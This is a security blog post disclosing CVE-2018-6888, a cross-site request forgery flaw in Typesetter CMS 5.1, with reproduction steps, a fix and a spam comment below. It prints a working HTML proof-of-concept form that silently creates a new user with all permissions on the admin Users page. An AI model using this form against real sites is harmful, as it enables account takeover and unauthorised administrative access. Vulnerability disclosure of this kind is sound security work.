Cross Site Request Forgery- Type Setter CMS 5.1-CVE-2018-6888


Hi Readers,


Recently while performing some open source security assessment, I came across an CMS “ Typesetter” CMS. Curious to explore its functionalities, I set up a local copy and started playing around to find security vulnerabilities’. 

Title of the Vulnerability:  Cross Site Request Forgery.
Vulnerability Class: Remote Code Execution/ Account takeover
Technical Details & Description: The application source code is coded in a way which allows malicious crafted HTML page to be executed directly without any anti csrf countermeasures.
CVE ID allocated:  CVE-2018-6888
Product & Service Introduction: TypeSetter 5.1

Steps to Re-Produce –
1.       Visit the application
2.       Visit the User Permissions Page.
3.        Goto add user, and create a csrf crafted exploit for the same , upon hosting it on a server and sending the link to click by victim, it gets exploited.
Exploitation Technique: A attacker can perform application modification to complete account takeover.
Severity Level: Critical
Security Risk:
The presence of such a risk can lead to user data compromise as well as account takeover
Exploit code:
<html>

  <body>
    <form action="http://localhost/cms/Admin/Users" method="POST">
      <input type="hidden" name="verified" value="475f10871b08f44c20dab5bc2cb55d17946e6c98fa8abf28c64a5a9dab0ee2e122fefcc29cae9cc2e48daf564bfe55665e26b2b2174dee14e83c5e6974cf3218" />
      <input type="hidden" name="username" value="samrat&#95;test" />
      <input type="hidden" name="password" value="sam9318" />
      <input type="hidden" name="password1" value="sam9318" />
      <input type="hidden" name="algo" value="password&#95;hash" />
      <input type="hidden" name="email" value="sam9318&#64;gmail&#46;com" />
      <input type="hidden" name="grant&#95;all" value="all" />
      <input type="hidden" name="cmd" value="newuser" />
      <input type="hidden" name="aaa" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affected Product Version: 5.1
Solution - Fix & Patch: The application code should be configured with an anti csrf token to mitigate the issue of Cross Site request forgery.





Comments

  1. The blog article very surprised to me! Your writing is good related to personal care In this I learned a lot! Thank you!, please checkout more information on Lotus Notes xpages Consultant

    ReplyDelete

Post a Comment

Popular posts from this blog

Arbitrary file upload and RCE in Wonder CMS - CVE-2017-14521

Cross Site Request Forgery- Intex Router N-150 | CVE-2018-12529

Stored XSS in Wonder CMS- CVE-2017-14522